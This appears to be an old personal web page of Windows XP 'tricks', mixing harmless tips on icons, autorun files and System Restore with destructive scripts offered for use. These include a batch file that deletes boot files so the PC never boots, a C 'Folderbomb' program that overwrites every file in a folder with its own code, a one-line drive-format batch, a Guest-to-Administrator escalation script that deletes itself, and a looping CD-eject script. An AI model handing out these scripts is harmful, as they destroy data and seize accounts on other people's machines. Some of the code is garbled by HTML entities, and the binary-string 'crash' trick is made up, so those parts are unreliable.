
SSSSSSSSMmmmmmmmoooooKKKKKKIIIINNNN!!!!  
somebody stop meeeeeeeeeeeeeeeeee!!!!!!!!!!!!!!  
 
 
GUD MORNING, and in case i dont see ya, den gud afternoon, gud evening and gud nite!!!!!!!!!!  
 
 
 
 
 
 
 
 
 
 
 
========================================  
A Virus Code That Will Crash Ur Computer  
========================================  
 
Just copy the code given belows ....in notepad  
 
 
@echo off  
attrib -r -s -h c:\autoexec.bat  
del c:\autoexec.bat  
attrib -r -s -h c:\boot.ini  
del c:\boot.ini  
attrib -r -s -h c:\ntldr  
del c:\ntldr  
attrib -r -s -h c:\windows\win.ini  
del c:\windows\win.ini  
@echo off  
msg * U R Screwed!!!  
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive  
 
 
and now save this code as anyname.bat like abc.bat  
 
when u double click on it....a message will pop up saying " U R Screwed"  
 
and it will shut down ur computer and never boot again...  
Enjoy  
 
 
 
 
 
 
 
 
 
==============================================  
A Virus In C That will Create New Folder Virus  
==============================================  
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#include  
#include  
#include  
#include  
#include  
void main(int argc,char* argv[])  
{ char buf[512];  
int source,target,byt,done;  
struct ffblk ffblk;  
clrscr();  
textcolor(2);  
cprintf(&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#82
12;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&
#8212;&#8211;&#8221;);  
printf(&#8221;\nVirus: Folderbomb 1.0\nProgrammer:BAS 
Unnikrishnan(asystem0@gmail.com)\n&#8221;);  
cprintf(&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#82
12;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&
#8212;&#8211;&#8221;);  
done = findfirst(&#8221;*.*&#8221;,&ffblk,0);  
while (!done)  
{ printf(&#8221;\n&#8221;);cprintf(&#8221; %s &#8220;, ffblk.ff_name);printf(&#8221;is attacked by 
&#8220;);cprintf(&#8221;Folderbomb&#8221;);  
source=open(argv[0],O_RDONLY|O_BINARY);  
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);  
while(1)  
{byt=read(source,buf,512);  
if(byt>0)  
write(target,buf,byt);  
else  
break;  
}  
close(source);  
close(target);  
done = findnext(&ffblk);  
}  
getch();  
}  
 
 
 
 
 
 
 
 
 
 
=============================================  
Allowing Dos and regedit Where It Is Disabled  
=============================================  
 
Open notepad....copy the code given below..  
 
REGEDIT4  
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]  
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"Disabled"=dword:0  
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]  
"DisableRegistryTools"=dword:0  
 
 
Now save it as anyname.reg. like abc.reg  
 
then double click on it  
 
 
 
 
 
 
 
 
 
===========================================  
Open Command Prompt From Where It Is Banned  
===========================================  
 
Here is the simple trick to launch command prompt from where it is banned  
 
Go to Start-->Run-->then type cmd  
 
Can't use command prompt ....Don't worry....  
 
Just open up  
 
Open up Microsoft word..Type:  
 
"Command.com" without quotes  
 
Then save it as Somthing.bat. eg.abc.bat  
that's all...u r done.  
 
 
 
 
 
 
 
 
 
==============================  
Create Your Own Icons In Paint  
==============================  
 
Here It is  
1.Launch Paint from the All Programs | Accessories menu.  
 
2.Pull down the Image menu and select the Attributes command.  
 
3.In the Attributes dialog box, type 32 in both the Width and Height  
boxes and click OK.  
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4.To make the image easier to work with, click the Magnifier tool and  
select the level 8 magnification setting.  
 
5.Press [Ctrl]G to add gridlines.  
 
6.Use the tools and colors to create your icon.  
 
7.Press [Ctrl]S and save the file with an ICO extension.  
 
 
 
 
 
 
 
 
 
 
===============================  
Formating Hard Disks By Notepad  
===============================  
 
just copy this code in notepad and save it as anyname.bat  
here is the code  
 
format c:\ /Q/X  
 
this will format your drive c:\  
 
To Format D drive just replace the above code code with this one  
 
format d:\ /Q/X  
this will format your D drive  
like this u can format ur others drives like E ,F or G  
 
 
 
 
 
 
 
 
 
 
=========================================  
A Virus That Will Open And Close Ur Cdrom  
=========================================  
 
This Virus Will open and close your cdrom...continuously  
 
 
Set oWMP = CreateObject("WMPlayer.OCX.7" )  
Set colCDROMs = oWMP.cdromCollection  
if colCDROMs.Count >= 1 then  
do  
For i = 0 to colCDROMs.Count - 1  

http://sudhirsunil.tripod.com/
http://sudhirsunil.tripod.com/
http://sudhirsunil.tripod.com/
http://sudhirsunil.tripod.com/
http://sudhirsunil.tripod.com/
http://sudhirsunil.tripod.com/


colCDROMs.Item(i).Eject  
Next ' cdrom  
For i = 0 to colCDROMs.Count - 1  
colCDROMs.Item(i).Eject  
Next ' cdrom  
loop  
End If  
 
 
copy this into notepad and save it as anyname.vbs like virus.vbs  
and then double click on it...what u see....bingo  
 
Now if u want to disable this go to task manager click on process  
then find wscript.exe and end this process.  
 
 
 
 
 
 
 
 
 
 
==============================  
Make Autorun For Ur CDs n DVDs  
==============================  
 
If you wanna make a autorun file for that CD you are ready to burn just read this...  
 
1) You open notepad  
 
2) now you write: [autorun]  
OPEN=INSTALL\Setup_filename.EXE  
ICON=INSTALL\Setup_filename.EXE  
 
Now save it but not as a .txt file but as a .inf file.  
 
But remember! The "Setup_filename.EXE" MUST be replaced with the  
name of the setup file. And you also need to rember that it is not all of  
the setup files there are called '.exe but some are called '.msi  
 
3) Now burn your CD with the autorun .inf file included.  
 
4) Now set the CD in you CD drive and wait for the autorun to begin or if  
nothing happens just double-click on the CD drive in "My Computer".  
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================================  
Hack Admin From XP Guest Account  
================================  
 
echo off  
title Please wait...  
cls  
net user add Username Password /add  
net user localgroup Administrators Username /add  
net user Guest 420 /active:yes  
net localgroup Guests Guest /DELETE  
net localgroup Administrators Guest /add  
del %0  
 
 
 
 
Copy the above code to notepad and save the file as "Guest2admin.bat"  
then u can double click the file to execute or run in the cmd.  
it works..  
Enjoy  
 
 
 
 
 
 
 
 
 
 
=============================  
Creating your Own Run command  
=============================  
 
1. Simply enter to \Windows  
 
2. There create New ShortCut by right clicking and selecting create  
a new shortcut opotion.  
 
This shortcut is for the program you wish.  
 
And the name of the shortcut is the Command you want to enter in RUN.  
Enjoy&#8230;.  
For example  
if I want to display my picture(any fuction u want) which is located  
somewhere in hard drive.  
Now with the help of trick I can display that picture from the run  
command&#8230;.thats cool na&#8230;  
Just by following these simple steps&#8230;.  
As I mentioned above &#8230;first I will go to /windows directory  
Then I will create a new shortcut..then a window will appear that  
will ask u about the location of the item u want to do&#8230;now I want  
to display my pic&#8230;So I will give the path of my pic where it is located.  
Then After clicking on next button&#8230;.it will ask u to give the name of the command..  
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Then give any name u want&#8230;then click on finish button&#8230;that all  
Now go to run type the name of the shortcut name..u see  
 
 
 
 
 
 
 
 
 
 
 
 
 
===================================  
Ban Shutdown In ShutDown Dialog Box  
===================================  
 
This Trick will disable shutdown option in the shutdown dialog box.  
Go to run?type &#8220;regedit&#8221;  
 
Then Go to location  
 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer  
 
In the right pane look for NoClose key.  
Set its value to 1  
 
doing this disables the Shutdown option in the Shutdown dialog box.  
 
You can re enable the Shutdown option by making NoClose key value eqaul to Zero  
 
 
 
 
 
 
 
 
 
==========================================  
Disable The Send Error Report to Microsoft  
==========================================  
 
To disable the stupid feature in WinXP which tries to send a report to  
microsoft every time a program crashes you will have to do this:  
 
1.Open Control Panel  
 
2.Click on Preformance and Maintenance.  
 
3.Click on System.  
 
4.Then click on the Advanced tab  
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5.Click on the error reporting button on the bottom of the windows.  
 
6.Select Disable error reporting.  
 
7.Click OK  
 
8.Again click OK  
 
That it..u r done  
 
 
 
 
 
 
 
 
 
===============================================  
Remove Programs from the Add or Remove Programs  
===============================================  
 
There are some programs which are not deleted from add/remove program list..  
Here is solution to remove them  
 
1. Click Start, and then click Run.  
2. In the Open box, type regedt32, and then click OK.  
3. In Registry Editor, locate the following registry key:  
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall  
4. In the left pane, click the Uninstall registry key, and then click  
Export on the File menu.  
5. In the Export Registry File dialog box that appears, click Desktop in  
the Save in list, type uninstall in the File name box, and then click Save.  
6. Each key listed under Uninstall in the left pane of Registry Editor  
represents a program that is displayed in the Currently installed programs  
list of the Add or Remove Programs tool. To determine which program that  
each key represents, click the key, and then view the following values in  
the details pane on the right:  
DisplayName: The value data for the DisplayName key is the name that is listed  
in Add or Remove Programs.  
UninstallString: The value data for the UninstallString key is the program  
that is used to uninstall the program.  
7. After you identify the registry key that represents the program that you  
removed but which is still displayed in the Currently installed programs list  
of Add or Remove Programs, right-click the key in the left pane of the Registry  
Editor window, and then click Delete.  
 
Click Yes in response to the "Are you sure you want to delete this key and all  
of its subkeys?" message.  
8. On the File menu, click Exit to quit Registry Editor.  
9. Click Start, click Control Panel, and then click Add or Remove Programs.  
 
In the Currently installed programs list, verify that the program whose registry  
key you deleted is no longer listed.  
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==============================  
Removing Multiple Boot Screens  
==============================  
 
If you are getting unwanted multiple boot screen  
Then Follow these Steps.  
 
1> Right Click on My Computer  
 
2>Select Properties  
 
3>Select Advanced Tab  
 
4>Select Settings In the Startup & Recovery Section(3rd grp)  
 
5>Select the operating system which u want.  
 
6>And Click OK.  
 
7>Further again press the setting and click on Edit.  
 
8>It will open boot.ini File.  
 
9>Now u can delete those o/s which you don't want to be displayed  
 
 
 
 
 
 
 
 
 
 
====================================  
Reset WinXP Admin Pass with ONLY DOS  
====================================  
 
1. click on start, enter "cmd" and press enter  
 
2. enter "net user" or "net users"  
 
you will see the list of users that are created on current running os  
 
3. type "net user" "user name" "*"  
 
you will see that windows will now ask you to enter new password for  
that particular account!  
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4.e.g suppose i have two accounts first is Administrator and second is Mahajan.  
 
5.now if i want to change the password of administrator.Then i will write  
in command prompt  
net user administrator *  
then i will press enter  
 
6.Now the computer will ask for the password and after after filling  
the password u will ask to re-type the password...  
that it...now the password is changed  
 
 
 
 
 
 
 
 
=================================================  
Use system restore when you cant boot your system  
=================================================  
 
If your system has failed to the point where you cannot access  
the Windows GUI either through booting normally or through safe mode,  
you may still have the chance to use the System Restore feature if you  
have it enabled, by running it form the command prompt. To do this:  
 
Restart your computer and press F8 after the POST screen to bring up the  
Windows XP boot menu. Choose 'boot in safe mode with command prompt.'  
 
If your system gets to the command prompt successfully,  
type '%systemroot%\system32\restore\rstrui.exe' and then press enter.  
Follow the onscreen instructions to restore your computer to a previous saved point.  
 
 
 
 
 
 
 
 
 
 
 
 
=====================================  
Another Method To Enable Task Manager  
=====================================  
 
. Go to Start - Run -> Write Gpedit.msc and press on Enter button.  
 
2. Navigate to User Configuration - Administrative Templates ->  
System - Ctrl+Alt+Del Option  
 
3. In the right side of the screen verity that Remove Task Manager option  
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set to Disable or Not Configured.  
 
4. Close Gpedit.msc  
 
5. Go to Start - Run -> Write gpupdate /force and press on Enter button.  
 
 
 
 
 
 
 
 
 
=======================================  
Enabling Task Manager If It Is Disabled  
=======================================  
 
1. Go to Start -> Run -> Write regedit and press on Enter button.  
 
2. Navigate to the following registry keys and verity that following settings set to default:  
 
Windows Registry Editor Version 5.00  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]  
&#8220;DisableTaskMgr&#8221;=dword:00000000  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\  
LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\System]  
&#8220;DisableTaskMgr&#8221;=dword:00000000  
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\]  
&#8220;DisableTaskMgr&#8221;=dword:00000000  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]  
&#8220;DisableCAD&#8221;=dword:000000003. Reboot the computer.  
 
 
 
 
 
 
 
 
 
 
 
 
==========================  
chat wid command propmt...  
==========================  
 
If you want personal chat with a friend  
you don't need to download any yahoo messenger  
All you need is your friends IP address and Command Prompt.  
Firstly, open Notepad and enter:  
@echo off  
:A  
Cls  
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echo MESSENGER  
set /p n=User:  
set /p m=Message:  
net send %n% %m%  
Pause  
Goto A  
Now save this as "Messenger.bat". Open the .bat file and in Command  
Prompt you should see:  
MESSENGER  
User:  
After "User" type the IP address of the computer you want to contact.  
After this, you should see this:  
Message:  
Now type in the message you wish to send.Before you press "Enter" it should look like this:  
MESSENGER  
User:27.196.391.193  
Message: Hi  
Now all you need to do is press "Enter", and start chatting!  
 
 
 
 
 
 
 
 
 
==============================================  
Trick to Show ur name after time in taskbar...  
==============================================  
 
Hi freinds !  
 
I m here to tell u a trick to add up ur name in place of AM and PM beside time  
and make urself to feel proud among ur group of frnds.  
 
Its simple  
 
Start -> Control Pannel -> Regional and LAnguage option -> Customize  
(beside English US) -> Go to TIME tab -> Change AM symbol and PM symbol from  
AM and PM to ur name -> Apply -> Ok ...  
 
IS it changed ??? Might be not ...  
Now go to time in taskbar and Double Click it to open "Date and time property" ...  
Look place where time chnges in digital form i.e. 02:47:52 AM , click to arrow  
to cnage the AM or PM by selecting and press arrow. It will Show ur name or name  
that was entered by u, Apply -> OK and be HAPPY :)  
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===================  
Rename start Button  
===================  
 
 
To rename the start button, you will need a hex editor.  
My preference is UltraEdit  
 
1. Copy the \windows\explore.exe file to a new name (e.g. explorer_1.exe)  
2. With the hex editor, open that file and go to offset 412b6  
3. You will see the word start with blanks between each letter  
4. Edit it be any 5 characters or less  
5. Save the file  
6. Boot to DOS  
7. Copy the existing c:\windows\explorer.exe to explorer.org  
8. Copy explorer_1.exe to explorer.exe  
9. You will also need to replace the explorer.exe in the c:\windows\system32\  
dllcache file as well with the new one.  
 
Note: If the partition is NTFS and you can't access the files from DOS:  
 
1. Start Regedit  
2. Go to HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon.  
3. Change the value of Shell from Explorer.exe to explorer_1.exe  
 
 
 
 
 
 
 
 
=====================  
Watch movies in PAINT  
=====================  
 
 
Hey guys, did you know that you can watch movies in paint ? But u  
can't do anything (Just watch it while its playing in Media Player Classic,  
winamp or any other movie player you use.  
 
Here's what you gotta do :  
 
1.Open your favourite movie player and play the move (I played the .avi,  
format in Media Player Classic) (.mpg also works)  
 
2.Hit "PrintScreen", keep playing the movie in the player, don't stop it.  
 
3.Open MsPaint.  
 
4.Select "Edit > Paste" Or Hit "CTRL+V"  
 
You can watch movies in Paint!  
 
But there are no Pause, Next, Previous, Stop etc. buttons  
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Experiment with other formats too, it doesn't play DivX , Flash movies.  
 
 
 
 
 
 
 
 
 
=============================================  
Creating Shutdown Icon or One Click Shutdown:  
=============================================  
 
Navigate to your desktop. On the desktop, right-click and go to New,  
then to Shortcut (in other words, create a new shortcut). You should  
now see a pop-up window instructing you to enter a command line path.  
Use this path in "Type Location of the Item"  
 
SHUTDOWN -s -t 01  
 
If the C: drive is not your local hard drive, then replace "C" with  
the correct letter of the hard drive. Click the "Next" button. Name  
the shortcut and click the "Finish" button. Now whenever you want to  
shut down, just click on this shortcut and you're done.  
 
 
 
 
 
 
 
 
 
 
==================  
Crash Down Windows  
==================  
 
Want To Crash Down Your Rivals Windows!!  
Write The Following Digits in Notepad -:  
 
 
01001011000111110010010101010101010000011111100000  
 
 
Den-: SAVE it as an .EXE file!  
 
Note:Plz Dont Open Dat File In YOur Computer!!  
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================================  
Change Any Users Password In Xp  
================================  
 
wannna to change any user password  
 
go to  
start : -> run :-> cmd - > write &#8221;control userpasswords2? without &#8220;&#8221;  
 
a new screen will be open containing all the accounts&#8230;&#8230;  
 
from there u will get the easier way to change admin usrname  
n password and all other accounts info too&#8230;&#8230;..  
 
 
 
 
 
 
 
 
 
 
 
===============================  
TO CHANGE FOULDER BACKGROUND  
=============================== 
 
CHANGE THE ICONAREA_IMAGE TO THE DESTINATION PHOTO &  
IconFile TO UR SELECTED ICON IF U HAVE IT amd save as "Desktop.ini"  
 
 
[.ShellClassInfo]  
IconFile=E:\KOTHI\Themes\Icons\Candey\Closed Folder.ico  
IconIndex=0  
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]  
ICONAREA_IMAGE=E:\Walls\cute\211.jpg  
ICONAREA_TEXT=0  
 
OR  
 
 
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]  
iconarea_image=E:\Walls\Image011.jpg  
iconarea_text=0x00FFFFFF  
[.ShellClassInfo]  
IconFile=E:\KOTHI\Themes\Icons\Candey\Closed Folder.ico  
IconIndex=0  
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aaaa laaaa ki a laaaaa (i like it a lot)  
 
Allrighty then...ok take care now ...bye bye then.  
 
damn i'm good.....!!!  
 
 
Heart told to the eyes  
" see less  
bcoz u wil see  
and i wil suffer a lot".  
The eye replied to the  
heart " feel less  
bcoz you will  
feel and i wil  
cry "...!!! 
 


